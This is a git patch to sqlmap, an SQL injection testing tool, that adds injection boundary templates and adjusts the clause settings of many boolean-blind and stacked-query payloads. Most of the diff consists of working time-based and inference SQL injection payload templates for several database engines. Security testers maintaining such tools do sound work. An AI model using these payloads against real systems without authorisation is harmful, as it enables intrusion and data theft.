From 35d9ed84769111738bb817e0914b01c559b7b82b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:30:58 +0200 Subject: [PATCH] Cleaning a mess with stacked queries and pre-WHERE boundaries --- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++ txt/checksum.md5 | 10 ++--- xml/boundaries.xml | 36 +++++++++++++++++ xml/payloads/boolean_blind.xml | 18 ++++----- xml/payloads/stacked_queries.xml | 68 ++++++++++++++++---------------- 6 files changed, 89 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a133d608..cdb05523a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.22" +VERSION = "1.2.9.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index ee4d8573d..6ea796060 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission """ import os +import re from xml.etree import ElementTree as et @@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cdd4e99d..0dd04c2cd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1778dd902fbe5392377fd9b723898bbb lib/core/settings.py +4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py @@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml +3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8f2351412..857551e6b 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -413,6 +413,42 @@ Formats: '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )+' + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 00ba460f6..7b9e5b46e 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1386,7 +1386,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1407,7 +1407,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1428,7 +1428,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) @@ -1449,7 +1449,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 @@ -1469,7 +1469,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] @@ -1491,7 +1491,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) @@ -1513,7 +1513,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL @@ -1533,7 +1533,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;IIF([INFERENCE],1,1/0) @@ -1553,7 +1553,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END diff --git a/xml/payloads/stacked_queries.xml b/xml/payloads/stacked_queries.xml index 2ecd2ef49..1471df7d0 100644 --- a/xml/payloads/stacked_queries.xml +++ b/xml/payloads/stacked_queries.xml @@ -7,7 +7,7 @@ 4 2 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -28,7 +28,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -48,7 +48,7 @@ 4 3 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -69,7 +69,7 @@ 4 4 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -89,7 +89,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -109,7 +109,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -128,7 +128,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -149,7 +149,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -169,7 +169,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -189,7 +189,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -208,7 +208,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -230,7 +230,7 @@ 4 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -251,7 +251,7 @@ 4 1 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -273,7 +273,7 @@ 4 4 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -294,7 +294,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -314,7 +314,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -333,7 +333,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -353,7 +353,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -372,7 +372,7 @@ 4 4 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -392,7 +392,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -411,7 +411,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -431,7 +431,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -450,7 +450,7 @@ 5 3 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -470,7 +470,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -489,7 +489,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -510,7 +510,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -530,7 +530,7 @@ 4 4 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -551,7 +551,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -571,7 +571,7 @@ 5 4 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -591,7 +591,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -610,7 +610,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -631,7 +631,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -651,7 +651,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -672,7 +672,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END